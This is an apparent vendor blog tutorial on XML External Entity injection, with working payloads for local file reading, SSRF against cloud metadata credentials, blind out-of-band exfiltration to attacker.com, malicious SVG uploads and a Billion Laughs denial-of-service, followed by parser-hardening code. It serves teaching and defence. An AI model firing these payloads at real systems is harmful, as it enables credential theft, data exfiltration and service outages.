What is XML External Entity (XXE) Injection? Ways to Exploit, Examples and Impact

Learn what XXE injection is, how to exploit it with payloads, and how to prevent it. A comprehensive guide for cybersecurity beginners and professionals.

What is XML External Entity (XXE) Injection? Ways to Exploit, Examples and Impact

XML External Entity (XXE) injection is a critical web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. In some situations, an attacker can leverage an XXE vulnerability to escalate an attack to compromise the underlying server or other back-end infrastructure, by leveraging XXE to perform server-side request forgery (SSRF) attacks.

In this guide, we will dive deep into the technical mechanics of XXE, explore various exploitation techniques with concrete examples, and discuss how you can secure your infrastructure against these threats. Whether you are a developer looking to write safer code or a security enthusiast learning the ropes, understanding XXE is a fundamental step in mastering modern web security.

What is XML and Why is it Vulnerable?

To understand XXE, we first need to understand XML (e-Xtensible Markup Language). XML is a popular data format used for storing and transporting data. Unlike HTML, which is designed to display data, XML is designed to carry data in a structured way. Many web applications use XML to communicate between the client and the server, or between different internal services.

The Role of DTDs (Document Type Definitions)

The vulnerability arises from a feature of the XML specification called Document Type Definitions (DTD). A DTD contains declarations that can define the structure of an XML document, the types of data values it can contain, and more. One specific feature of DTDs is the ability to define XML entities.

Understanding XML Entities

Think of an XML entity as a variable. You define it once in the DTD and then reference it throughout the XML document. There are two main types of entities:

External Entities: These are defined using a system identifier, which is usually a URL or a file path. This tells the XML parser to fetch the content from an external source. This is the root cause of XXE injection.

<!DOCTYPE note [
  <!ENTITY externalData SYSTEM "http://attacker.com/data.txt">
]>
<note>
  <content>&externalData;</content>
</note>

Internal Entities: These are defined within the DTD itself. For example:

<!DOCTYPE note [
  <!ENTITY myName "Jsmon User">
]>
<note>
  <author>&myName;</author>
</note>

When the XML parser processes this, &myName; is replaced with "Jsmon User".

If an application takes user-supplied XML and parses it with a poorly configured XML parser that resolves these external entities, an attacker can point the SYSTEM identifier to sensitive local files or internal network resources.

How to Exploit XXE: Practical Examples

Exploiting XXE depends on how the application processes the XML and what output is returned to the user. Here are the most common exploitation scenarios.

1. Retrieving Local Files (In-band XXE)

This is the most straightforward form of XXE. An attacker modifies the XML sent to the server to include an external entity that points to a sensitive file on the server's filesystem, such as /etc/passwd on Linux or C:\Windows\win.ini on Windows.

Original Request:

POST /stockCheck HTTP/1.1
Content-Type: application/xml

<stockCheck>
    <productId>123</productId>
</stockCheck>

Malicious XXE Payload:

POST /stockCheck HTTP/1.1
Content-Type: application/xml

<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>

If the application displays the productId back to the user in the response, the content of /etc/passwd will be rendered in the browser or API response. This allows the attacker to map out users, service accounts, and system configurations.

2. Exploiting XXE to Perform SSRF

Server-Side Request Forgery (SSRF) occurs when an attacker can induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In an XXE context, this is done by pointing the external entity to a URL instead of a file.

SSRF Payload for Internal Metadata:

<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"> 
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>

In cloud environments like AWS, the IP 169.254.169.254 is a local endpoint that provides instance metadata. By exploiting XXE, an attacker could potentially steal IAM credentials, giving them full access to the organization's cloud infrastructure. This highlights why monitoring your attack surface with Jsmon is critical for identifying these hidden entry points.

3. Blind XXE (Out-of-Band Data Exfiltration)

Sometimes, the application does not return the value of any defined entities in its response. This is known as Blind XXE. To exploit this, attackers use "Out-of-Band" (OOB) techniques. They force the server to make a request to a server they control, appending the sensitive data as a URL parameter.

This usually requires an external DTD hosted on the attacker's server.

Attacker's hosted file (malicious.dtd):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;

Payload sent to victim:

<!DOCTYPE test [
  <!ENTITY % remote SYSTEM "http://attacker.com/malicious.dtd">
  %remote;
]>
<stockCheck><productId>1</productId></stockCheck>

In this scenario, the victim server fetches the DTD, which in turn reads the /etc/hostname file and sends its content back to the attacker's web logs via a GET request.

Advanced XXE Attack Vectors

XXE isn't always found in simple POST bodies. Because XML is a ubiquitous format, it can hide in various file types and protocols.

XXE via File Uploads (SVG and Office Docs)

Many modern file formats are actually zipped XML files. This includes .docx, .xlsx, and .pptx (Office Open XML) as well as .svg (Scalable Vector Graphics) images. If an application allows users to upload an SVG and then processes it on the server (e.g., to resize it or convert it to a PNG), it might be vulnerable to XXE.

Malicious SVG Example:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" >
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

If the server renders this SVG, the resulting image might contain the server's hostname text.

The "Billion Laughs" Attack (DoS)

While most XXE discussions focus on data theft, XXE can also be used for Denial of Service (DoS). The "Billion Laughs" attack uses nested entities to cause an exponential expansion of data in the server's memory, eventually crashing the process.

<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!-- ... and so on until lol9 ... -->
]>
<lolz>&lol9;</lolz>

A small XML block can expand to gigabytes of data, exhausting server RAM.

The Real-World Impact of XXE

The impact of XXE can range from minor information disclosure to full system compromise. The primary risks include:

  • Confidentiality Breach: Accessing sensitive files like configuration files, source code, or credentials.
  • Internal Network Mapping: Using the server as a pivot point to scan internal ports and services that are not exposed to the public internet.
  • Cloud Credential Theft: Accessing metadata services to steal temporary security tokens.
  • Denial of Service: Crashing the application or the entire server through resource exhaustion.

Because XML is often used in legacy systems and complex enterprise integrations, XXE vulnerabilities can remain hidden for years. This is why continuous reconnaissance with tools like Jsmon is vital for maintaining a strong security posture.

How to Prevent XXE Injection

The most effective way to prevent XXE is to disable DTDs (External Entities) entirely in your XML parsing library. Most modern parsers have these features enabled by default for backward compatibility, so you must explicitly turn them off.

Prevention in Java (DocumentBuilderFactory)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
String FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
dbf.setFeature(FEATURE, true);

// If you cannot disable DTDs entirely, disable external entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

Prevention in Python (lxml)

from lxml import etree

# Disable network and file access for external entities
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.fromstring(xml_data, parser=parser)

Prevention in PHP (libxml)

// Disable the ability to load external entities globally
libxml_disable_entity_loader(true);
$xml = simplexml_load_string($xml_string);

General Best Practices

  1. Use Safer Data Formats: If possible, switch to JSON or other formats that do not support complex features like DTDs.
  2. Keep Libraries Updated: Ensure your XML parsing libraries are patched to the latest versions.
  3. Input Validation: Implement a "deny-list" for dangerous keywords like SYSTEM, PUBLIC, and ENTITY in XML inputs, though this is less reliable than disabling DTDs.
  4. Least Privilege: Run your application with the minimum necessary filesystem permissions so that even if an XXE exists, the attacker cannot read sensitive files like /etc/shadow.

Conclusion

XML External Entity (XXE) injection remains one of the most prevalent and dangerous vulnerabilities in the web landscape. By understanding how DTDs and external entities work, developers can take proactive steps to harden their applications. From simple file retrieval to complex out-of-band exfiltration and SSRF, the versatility of XXE makes it a favorite for attackers.

Securing your application requires a combination of secure coding practices, regular dependency updates, and robust infrastructure monitoring. By disabling DTD processing and following the principle of least privilege, you can effectively neutralize this threat.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.